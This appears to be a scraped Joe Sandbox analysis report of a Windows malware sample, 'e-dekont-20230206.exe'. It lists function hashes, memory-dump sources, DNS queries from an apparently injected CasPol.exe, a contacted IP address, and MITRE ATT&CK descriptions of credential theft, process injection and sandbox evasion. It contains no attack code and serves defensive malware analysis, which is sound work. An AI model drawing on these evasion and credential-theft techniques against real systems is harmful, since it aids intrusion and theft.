Opcode Fuzzy Hash: b20be8e198cb1939327fd1e2d727f9ccaf70f2a52a23020f14975c7585987fb3
Instruction Fuzzy Hash: AC41F5317002019FEB68AB789415A6E7AEBBFC8644F24482CF007DB390EF75DC058B95

Uniqueness

Uniqueness Score: -1.00%

Function 05A3EAFA Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d03ad6f14b946bc4448bdda50babc608688d75f57581129628beaca5562e9b
Instruction ID: 492ef4dd1697008b5a8bd67134eb3f7ed6bf6aa9dad0f73e6b47f4823fd2a7e4
Opcode Fuzzy Hash: d6d03ad6f14b946bc4448bdda50babc608688d75f57581129628beaca5562e9b
Instruction Fuzzy Hash: 7A317C70A102499BCB19CF65D455AAEF7B6FF89300F10C929E816EB350DB70AC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05A3EB08 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70d725a5b673404b28c934833e945c1bf36ce06567cfb598cf0b3739465a744
Instruction ID: f08e00b310a63648c013af253845eeda64973387312d857fc7177d458f030a06
Opcode Fuzzy Hash: c70d725a5b673404b28c934833e945c1bf36ce06567cfb598cf0b3739465a744
Instruction Fuzzy Hash: 70315E70A00209DBCB19CF65D455AAEB7B6FF89304F10C519E816EB350DB70EC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05A3F010 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6daf8cc77b90b5c386707657e91657c3fde1b41cd8316ec5880015c032a48df
Instruction ID: c5abb8cffd1335d121dab0113708ce440775cb7a4c61abed645c9db0d2a8f941
Opcode Fuzzy Hash: f6daf8cc77b90b5c386707657e91657c3fde1b41cd8316ec5880015c032a48df
Instruction Fuzzy Hash: 2C217F71E1020A8FCB108BAED8419BEB7B6BFC5244F248076E92197244EB39D902CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05A3EFFF Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2684e3ce909d246693a2767d075a4646fdbdf2adf077fba857f1a0898dddf841
Instruction ID: 6bab992514d6871fd551598527184fa0f3a3fade2ebc28ae4ae37e9a4ab8cef9
Opcode Fuzzy Hash: 2684e3ce909d246693a2767d075a4646fdbdf2adf077fba857f1a0898dddf841
Instruction Fuzzy Hash: F321A474E142068FCF25CFBAC4519BFBBB6BF85244F148066E911D7345EA79C902CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05A3F0C8 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05d9dbf35daa7c75c75f8941681242b667664a005214e4f1886f6a760feffd5
Instruction ID: 126d27df4bb5fcf135c8438e8682a7ac18822d8099c0069afecadecf4a5cba83
Opcode Fuzzy Hash: b05d9dbf35daa7c75c75f8941681242b667664a005214e4f1886f6a760feffd5
Instruction Fuzzy Hash: 84012C71F001299F8F54DFB9E8056EEBBF7BB98211F00452AD545E7304EB3486028BA5

Uniqueness

Uniqueness Score: -1.00%

Function 05A3EFC1 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ad8d301d7c4b89461a78d130dcd9e2c984592e730f89965a310d84f581731b
Instruction ID: 983f10f39421c673def7f28182f950d5bce7933ccb869a334448707caea0cdb6
Opcode Fuzzy Hash: 94ad8d301d7c4b89461a78d130dcd9e2c984592e730f89965a310d84f581731b
Instruction Fuzzy Hash: D2E04F7184D3C0AFCB129BB49859D96BFB89F1214070980DFE8956B583D2286515C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 05A3EFE8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb6d2ae8b674123a627264df53720587c41e273a5c38291756bd4cad7e70f0e
Instruction ID: 3f5939fb8f83fe203aa56118c307e14220a4fc90e1514baf05349a16d5bc97e1
Opcode Fuzzy Hash: 5bb6d2ae8b674123a627264df53720587c41e273a5c38291756bd4cad7e70f0e
Instruction Fuzzy Hash: 40B09B71004248A786005695A5188657F9C5755501704C055F64547181C535E511D7A4

Uniqueness

Uniqueness Score: -1.00%

Source: Joe Sandbox View	IP Address: 64.185.227.155 64.185.227.155
Source: Joe Sandbox View	IP Address: 64.185.227.155 64.185.227.155

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	DNS query: name: api.ipify.org

Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report e-dekont-20230206.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230206.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

Windows Analysis Report
e-dekont-20230206.exe

Function 00007FF9A5D997C9 Relevance: 1.9, APIs: 1, Instructions: 368
processCOMMON

Function 00007FF9A5D97982 Relevance: 1.9, APIs: 1, Instructions: 361
processCOMMON

Function 00007FF9A5D9A13D Relevance: 1.7, APIs: 1, Instructions: 211
injectionCOMMON

Function 00007FF9A5D979E2 Relevance: 1.7, APIs: 1, Instructions: 200
injectionCOMMON

Function 00007FF9A5D99DE5 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Function 00007FF9A5D979D2 Relevance: 1.7, APIs: 1, Instructions: 180
COMMON

Function 00007FF9A5D99F9D Relevance: 1.7, APIs: 1, Instructions: 179
memoryCOMMON

Function 00007FF9A5D97A02 Relevance: 1.7, APIs: 1, Instructions: 167
memoryCOMMON

Function 00007FF9A5D99C69 Relevance: 1.7, APIs: 1, Instructions: 166
threadCOMMON

Function 00007FF9A5D979C2 Relevance: 1.7, APIs: 1, Instructions: 161
threadCOMMON

Function 00007FF9A5D979A2 Relevance: 1.7, APIs: 1, Instructions: 161
threadCOMMON

Function 00007FF9A5D9A449 Relevance: 1.6, APIs: 1, Instructions: 126
threadCOMMON

Function 06B90290 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Function 06F4E448 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130
COMMON

Function 06B92208 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61
COMMON

Function 06B9B399 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
libraryCOMMON

Function 06F4CD4C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
COMMON

Function 06B99F54 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
libraryCOMMON

Function 06B922CA Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Function 05A3EE21 Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre